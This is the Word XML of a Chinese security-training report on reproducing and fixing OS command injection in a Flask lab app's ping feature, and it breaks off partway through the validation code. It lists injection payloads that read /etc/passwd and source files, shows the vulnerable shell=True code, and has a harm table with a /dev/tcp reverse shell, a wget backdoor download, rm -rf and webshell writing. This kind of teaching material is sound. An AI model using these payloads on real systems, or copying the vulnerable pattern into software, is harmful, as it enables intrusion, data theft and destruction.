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B03A2E"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Flask 用户信息管理平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="595959"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Ping 网络诊断功能</w:t>
        <w:br/>
        <w:t>OS 命令注入 / RCE 远程代码执行漏洞</w:t>
        <w:br/>
        <w:t>复现及修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="C8C8C8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>----------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="646464"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验性质：OS 命令注入 / RCE 远程代码执行漏洞复现与修复实训</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="646464"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目标系统：Flask 用户信息管理系统（/ping 路由）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="646464"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文档版本：V1.0 终审版</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="646464"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>生成日期：2026 年 7 月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目  录</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一、实验概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二、漏洞总览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>三、漏洞详情与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.1  复现 1：分号注入读取系统敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.2  复现 2：管道符读取项目后端源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.3  复现 3：命令替换查看服务器权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.4  复现 4：Windows 系统命令注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    3.5  复现 5：换行符注入执行多条命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>四、漏洞危害总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>五、漏洞根因分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>六、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>七、修复汇总与安全对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>八、修复后安全验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="420" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>九、实验总结与心得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一、实验概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pP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本次实验针对 Flask 用户信息管理平台中的 Ping 网络诊断功能 /ping 进行安全审计。该路由使用 f-string 拼接用户输入的 ip 参数构建系统命令，并通过 subprocess.check_output() 以 shell=True 方式执行，导致存在严重的 OS 命令注入漏洞（CWE-78），可被利用实现远程代码执行（RCE）。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本次实验共发现 5 种命令注入利用方式：分号注入、管道符注入、命令替换注入、Windows &amp; 分隔符注入、换行符注入。攻击者登录后即可实现服务器远程控制。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实验流程包括：漏洞复现（浏览器手工操作）-&gt; 根因分析 -&gt; 安全加固 -&gt; 修复后验证，完整覆盖从攻击到防御的全生命周期。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二、漏洞总览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC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  <w:shd w:fill="B03A2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1701"/>
            <w:shd w:fill="B03A2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注入方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:shd w:fill="B03A2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Payload 示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="B03A2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攻击效果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VUL-RCE-01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分号注入 (;)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8.8.8.8; cat /etc/passwd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读取系统敏感文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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VUL-RCE-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701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管道符注入 (|)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551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127.0.0.1 | cat app.py</w:t>
            </w:r>
          </w:p>
        </w:tc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读取项目后端源码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VUL-RCE-03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命令替换 (&amp;&amp;)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127.0.0.1 &amp;&amp; id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查看服务器运行权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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VUL-RCE-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701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Windows &amp; 分隔符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551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127.0.0.1 &amp; type app.py</w:t>
            </w:r>
          </w:p>
        </w:tc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Windows 环境命令注入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VUL-RCE-05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换行符注入 (%0a)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127.0.0.1%0als -la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列出服务器目录文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="B03A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞根因一句话总结：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后端使用 f-string 拼接用户可控 ip 参数构建系统命令 + shell=True 交由系统 shell 解析 + 完全不对 ip 参数做校验过滤 = 三错叠加导致 RCE。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color w:val="B03A2E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>漏洞代码片段（修复前）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 修复前：三错叠加 -&gt; RCE</w:t>
        <w:br/>
        <w:t>ip = request.form.get("ip", "")  # 无过滤</w:t>
        <w:br/>
        <w:br/>
        <w:t># 错误 1: f-string 直接拼接用户输入</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 错误 2: shell=True 启用 shell 解析</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cmd,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    shell=True,       # 高危</w:t>
        <w:br/>
        <w:t xml:space="preserve">    timeout=30,</w:t>
        <w:br/>
        <w:t>)</w:t>
        <w:br/>
        <w:br/>
        <w:t># 错误 3: 结果完整回显</w:t>
        <w:br/>
        <w:t>result = output.decode()  # 攻击者看到全部输出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三、漏洞详情与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pP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sz w:val="22"/>
        </w:rPr>
        <w:t>环境前提：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靶场完整运行，登录后导航栏、首页存在「Ping 测试」入口，访问 /ping 可打开 ping.html 页面，POST 接口无 ip 参数过滤、shell=True 开启、字符串拼接命令。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3.1  复现 1：分号注入读取系统敏感文件（Linux）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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现步骤】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步骤 1：使用任意账号登录网站，点击导航栏「Ping 测试」进入 ping 页面。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步骤 2：IP 输入框填入 Payload：8.8.8.8; cat /etc/passwd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步骤 3：点击 Ping 按钮提交 POST 请求。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步骤 4：查看页面控制台输出区域。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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现结果】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系统先执行 ping -c 3 8.8.8.8，分号 ; 后继续执行 cat /etc/passwd，页面完整输出服务器所有系统账号、UID、Shell 等敏感信息，命令注入漏洞可利用。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sz w:val="22"/>
        </w:rPr>
        <w:t>攻击原理示意图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用户输入: 8.8.8.8; cat /etc/passwd</w:t>
        <w:br/>
        <w:t>拼接命令: ping -c 3 8.8.8.8; cat /etc/passwd</w:t>
        <w:br/>
        <w:t>shell 解析为两条独立命令:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  第 1 条: ping -c 3 8.8.8.8</w:t>
        <w:br/>
        <w:t xml:space="preserve">  第 2 条: cat /etc/passwd  ← 注入命令被成功执行</w:t>
        <w:br/>
        <w:t>页面输出:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  PING 8.8.8.8 (8.8.8.8) ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">  root:x:0:0:root:/root:/bin/bash</w:t>
        <w:br/>
        <w:t xml:space="preserve">  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...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3.2  复现 2：管道符读取项目后端源码 app.py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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现步骤】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步骤 1：登录进入 Ping 测试页面。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步骤 2：输入 Payload：127.0.0.1 | cat app.py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步骤 3：提交 Ping 请求，查看输出控制台。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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现结果】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管道符 | 生效，将 ping 命令的输出作为 cat 的输入丢弃，直接读取并完整打印 app.py 全部后端源代码，业务逻辑、接口路由、数据库密码、密钥配置全部泄露。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sz w:val="22"/>
        </w:rPr>
        <w:t>攻击原理示意图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用户输入: 127.0.0.1 | cat app.py</w:t>
        <w:br/>
        <w:t>拼接命令: ping -c 3 127.0.0.1 | cat app.py</w:t>
        <w:br/>
        <w:t>管道解析:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ping 输出 -&gt; 被管道丢弃</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cat app.py -&gt; 输出 app.py 全部源码</w:t>
        <w:br/>
        <w:t>页面输出: app.py 全部后端代码（路由/密钥/数据库配置）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3.3  复现 3：命令替换查看服务器权限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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现步骤】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步骤 1：Ping 页面输入 Payload：127.0.0.1 &amp;&amp; id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步骤 2：提交表单，查看页面返回内容。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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现结果】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ping 执行成功后执行 id 命令，页面输出当前运行网站进程的用户 ID、用户组信息。攻击者可确认 Web 进程运行权限，为后续提权做准备。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sz w:val="22"/>
        </w:rPr>
        <w:t>攻击原理示意图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用户输入: 127.0.0.1 &amp;&amp; id</w:t>
        <w:br/>
        <w:t>拼接命令: ping -c 3 127.0.0.1 &amp;&amp; id</w:t>
        <w:br/>
        <w:t>&amp;&amp; 短路解析:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  前面的 ping 成功退出码 0 -&gt; 执行 id</w:t>
        <w:br/>
        <w:t>页面输出:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  PING 127.0.0.1 ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">  uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)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3.4  复现 4：Windows 系统命令注入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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现步骤】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步骤 1：Windows 靶场环境，Ping 输入框填写：127.0.0.1 &amp; type app.py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步骤 2：提交 Ping 测试。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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现结果】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Windows 下 &amp; 分隔符生效，先执行 ping，后执行 type 读取 app.py 源码并回显，Windows 环境同样存在命令注入风险。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3.5  复现 5：换行符注入执行多条恶意命令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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现步骤】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步骤 1：输入 Payload（URL 编码换行 %0a）：127.0.0.1%0als -la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步骤 2：提交表单查看输出。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sz w:val="22"/>
        </w:rPr>
        <w:t>【复现结果】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换行符 %0a 被 shell 解析为新命令起始，并行执行 ls -la 列出服务器当前目录全部文件，批量泄露业务文件名称。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四、漏洞危害总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pP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攻击者仅需登录网站，通过 Ping 功能输入恶意 IP 参数即可实现远程代码执行（RCE），具体危害包括但不限于：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fill="B03A2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攻击类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
            <w:shd w:fill="B03A2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具体操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="B03A2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危害等级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读取系统敏感文件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cat /etc/passwd, /etc/shadow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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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读取项目源码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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cat app.py, cat config.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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高危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反弹 Shell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bash -c 'bash -i &gt;&amp; /dev/tcp/x.x.x.x/4444'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严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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下载恶意后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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wget http://xxx/shell.php -O /tmp/shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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严重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删除服务器文件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rm -rf /var/www/html/*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严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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内网横向渗透</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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nmap -sn 192.168.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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高危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获取服务器权限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id, whoami, uname -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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写入 WebShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118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echo '&lt;?php ...' &gt; webshell.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="113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严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="B03A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CVSS 3.1 评分：9.8（Critical）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攻击向量：网络 / 攻击复杂度：低 / 所需权限：低（仅需登录）/ 影响：机密性、完整性、可用性全部丧失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五、漏洞根因分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pP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sz w:val="22"/>
        </w:rPr>
        <w:t>三个致命错误的叠加导致 RCE：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color w:val="B03A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>错误 1：f-string 直接拼接用户输入构造系统命令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cmd = f'ping -c 3 {ip}' 将用户可控的 ip 参数直接嵌入 shell 命令字符串中。用户输入中的 ; | &amp; \$() ` 等字符被原样保留，成为 shell 语法的一部分。正确做法是通过参数列表传递，禁止拼接字符串。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color w:val="B03A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>错误 2：shell=True 启用系统 shell 解析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shell=True 将命令字符串交由 /bin/sh 解析执行。Shell 会解释 ; | &amp; 等元字符为命令分隔符和管道操作，而非普通字符串参数。正确做法是使用默认的 shell=False，将命令和参数以列表形式传递。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color w:val="B03A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>错误 3：完全未对 ip 参数做任何校验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ip 参数直接从 request.form 获取后直接用于命令构建，无正则校验、无白名单、无黑名单过滤。实际上 IP 地址格式非常严格（4 段 0-255 数字），完全可以通过正则或 ipaddress 模块进行白名单校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>安全三原则破坏情况：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shd w:fill="B03A2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安全原则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="B03A2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本应怎么做</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="B03A2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实际做了什么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最小权限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禁止用户控制命令结构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用户输入直接嵌入命令字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417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纵深防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835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输入校验 + 安全执行方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835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无校验 + shell=True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默认安全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默认拒绝，仅放行合法输入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默认放行所有输入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六、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
      </w:pP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color w:val="27AE60"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复 1：废弃 f-string 拼接，改用参数列表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彻底废弃 cmd = f'ping -c 3 {ip}' 的写法，改用参数列表传递：subprocess.check_output(['ping', '-c', '3', ip], timeout=30)。参数列表方式中每个参数独立传递，不经过 shell 解析，ip 中的 ; | &amp; 等字符仅作为普通字符串参数传给 ping 命令，不会被 shell 解释为命令分隔符。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color w:val="27AE60"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>修复后代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 修复后：参数列表执行，无 shell 解析</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ["ping", "-c", "3", ip],  # 参数列表</w:t>
        <w:br/>
        <w:t xml:space="preserve">    timeout=30,</w:t>
        <w:br/>
        <w:t>)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color w:val="27AE60"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复 2：移除 shell=True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移除 shell=True 参数，使用其默认值 False。参数列表方式必须与 shell=False 配合使用，这也从根本上禁用了 shell 解析，所有参数被直接传递给系统调用 execve()。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color w:val="27AE60"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复 3：IP 格式白名单校验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新增 validate_ip_address() 函数，使用 ipaddress.ip_address() 进行严格格式校验。同时使用正则拦截 ; &amp; | ` \$() 等 shell 特殊字符。仅当输入为标准 IPv4 或 IPv6 地址时才允许执行 ping，否则直接返回错误提示。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color w:val="27AE60"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>校验函数代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="320" w:lineRule="exact"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>def validate_ip_address(ip_str):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    """校验 IP 地址格式，拦截 shell 注入。"""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if not ip_str or not ip_str.strip():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 拦截 shell 特殊字符</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if re.search(r'[;&amp;|`\$(){}&lt;&gt;\n\r]', ip_str):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return False</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # 标准 IP 格式校验</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ipaddress.ip_address(ip_str.strip())</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except ValueError:</w:t>
        <w:br/>
